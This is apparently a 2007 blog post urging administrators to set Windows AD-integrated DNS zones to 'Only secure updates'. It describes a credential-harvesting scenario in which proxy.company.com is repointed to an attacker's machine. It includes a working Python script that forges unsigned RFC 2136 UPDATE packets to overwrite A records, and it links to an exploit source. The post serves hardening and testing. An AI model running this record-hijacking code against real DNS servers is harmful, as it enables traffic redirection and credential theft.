Saturday, March 24, 2007

If you use Windows 2000 DNS (for Active Directory, etc.), allow only Secure Updates

Windows 2000 and later give you the option to store a DNS zone in Active Directory (an Active Directory-integrated zone, ADIZ). Dynamic update, where hosts and services register and refresh their own name records, is crucial to a successful Active Directory implementation (and to some other Microsoft products, such as Exchange), and an AD-integrated zone is what makes the secure flavour of dynamic update available: standard primary zones can only accept updates unauthenticated.

With dynamic update enabled, a client or server sends a DNS UPDATE packet (RFC 2136) to the Windows DNS service, which adds, replaces or deletes the named records in the zone accordingly.

However, administrators and implementers, remember that the zone's dynamic update setting must be "Only secure updates" (called "Secure only" in later versions), never "Yes" (nonsecure and secure). Why? Because with nonsecure updates allowed, anyone who can reach the DNS server on the network can send an UPDATE packet that rewrites an existing record, for instance the address of an internal host, or of an external one if you run split-horizon DNS, and redirect requests to a machine they control. The packet carries no credential at all. With "secure only", each update must be signed with the requesting computer's Kerberos identity (GSS-TSIG), and the DNS server then applies the ACL on the record, so only the account that registered a record (or an administrator) may change it.

An example: change proxy.company.com to point at your own PC. When the users' browsers connect to your fake proxy, challenge them for proxy authentication; they type their username and password and, unknowingly, hand them to you (in clear text if the proxy uses Basic authentication, or as challenge-response hashes to crack if it uses NTLM). What else you can do with this kind of attack is limited only by your imagination.
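To make the point concrete, here is an added example (not code from the original post, and not any tool the post links to) that forges exactly the kind of packet described above: an unsigned RFC 2136 UPDATE that replaces the A record of a host in a zone, followed by a small classifier for the server's reply. A zone that allows nonsecure updates applies the change and answers NOERROR; a zone set to "secure only" answers REFUSED because the request carries no GSS-TSIG signature. The server address, zone and host names are assumed lab values. The probe writes a record when the zone is nonsecure, so use a throwaway name and test only servers you are authorised to touch.

```python
"""Forge an RFC 2136 DNS UPDATE by hand and interpret the server's reply.

Added example for this post, not the post's own code. Everything is built
from the standard library so the packet structure is visible byte by byte.
"""
import random
import socket
import struct
from typing import Optional, Tuple

OPCODE_UPDATE = 5          # RFC 2136 opcode value
TYPE_A, TYPE_SOA = 1, 6
CLASS_IN, CLASS_ANY = 1, 255
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 8: "NOTAUTH", 9: "NOTZONE"}


def encode_name(name: str) -> bytes:
    """Encode a dotted name in DNS wire format (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_update(zone: str, name: str, ip: str, ttl: int = 300,
                 txid: Optional[int] = None) -> bytes:
    """Build an UPDATE that replaces every A record of `name` with `ip`.

    Sections per RFC 2136: header, zone (SOA of the target zone), no
    prerequisites, two update RRs (delete the A RRset, then add the new A),
    and an empty additional section, i.e. no TSIG signature at all.
    """
    if txid is None:
        txid = random.randrange(0, 0x10000)
    # ID, flags (QR=0, opcode=UPDATE, rcode=0), ZOCOUNT=1, PRCOUNT=0, UPCOUNT=2, ADCOUNT=0
    header = struct.pack("!HHHHHH", txid, OPCODE_UPDATE << 11, 1, 0, 2, 0)
    zone_section = encode_name(zone) + struct.pack("!HH", TYPE_SOA, CLASS_IN)
    # CLASS=ANY, TTL=0, RDLENGTH=0 means "delete the whole RRset of this type"
    delete_rrset = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_ANY, 0, 0)
    add_record = (encode_name(name)
                  + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
                  + socket.inet_aton(ip))
    return header + zone_section + delete_rrset + add_record


def parse_header(msg: bytes) -> dict:
    """Decode the 12-byte DNS header into its fields."""
    txid, flags, zo, pr, up, ad = struct.unpack("!HHHHHH", msg[:12])
    return {"id": txid, "qr": (flags >> 15) & 1, "opcode": (flags >> 11) & 0xF,
            "rcode": flags & 0xF, "zocount": zo, "prcount": pr,
            "upcount": up, "adcount": ad}


def classify_response(request: bytes, response: bytes) -> Tuple[str, str]:
    """Return (RCODE name, verdict) for the server's reply to `request`."""
    req, resp = parse_header(request), parse_header(response)
    if resp["id"] != req["id"] or not resp["qr"] or resp["opcode"] != OPCODE_UPDATE:
        return "INVALID", "reply does not match the request"
    rcode = RCODE_NAMES.get(resp["rcode"], str(resp["rcode"]))
    if rcode == "NOERROR":
        return rcode, "zone applied an unsigned update: nonsecure updates are allowed"
    if rcode == "REFUSED":
        return rcode, "zone rejected the unsigned update: secure-only (or updates off)"
    return rcode, "update not applied for another reason (wrong zone or server?)"


def probe(server: str, zone: str, name: str, ip: str,
          timeout: float = 3.0) -> Tuple[str, str]:
    """Send the forged update to `server` over UDP/53 and classify the answer.

    This WRITES a record if the zone is nonsecure: use a throwaway name and
    only against servers you are authorised to test.
    """
    request = build_update(zone, name, ip)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (server, 53))
        response, _ = sock.recvfrom(512)
    return classify_response(request, response)


if __name__ == "__main__":
    # Assumed lab values: a DNS server, a zone it hosts and a test name you own.
    print(probe("192.0.2.53", "corp.example", "dnsprobe-test.corp.example", "192.0.2.99"))
```

Nothing in that packet identifies the sender, which is the whole problem with nonsecure updates; "secure only" is what forces the TSIG record into the additional section. One caveat when reading server logs or captures: a Windows DNS client by default first tries an unsigned update and only falls back to a signed one after REFUSED, so a refused unsigned update from a domain member is normal, while a NOERROR answer to one is the misconfiguration this post is about.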

So, please set dynamic updates to "Only secure updates" on every AD-integrated zone, forward and reverse alike, and check the setting again after any zone is recreated or migrated, since "Yes" (nonsecure and secure) is the easy choice to leave in place.

DNSFUN source: http://securitydot.net/xpl/exploits/vulnerabilities/articles/1578/exploit.html
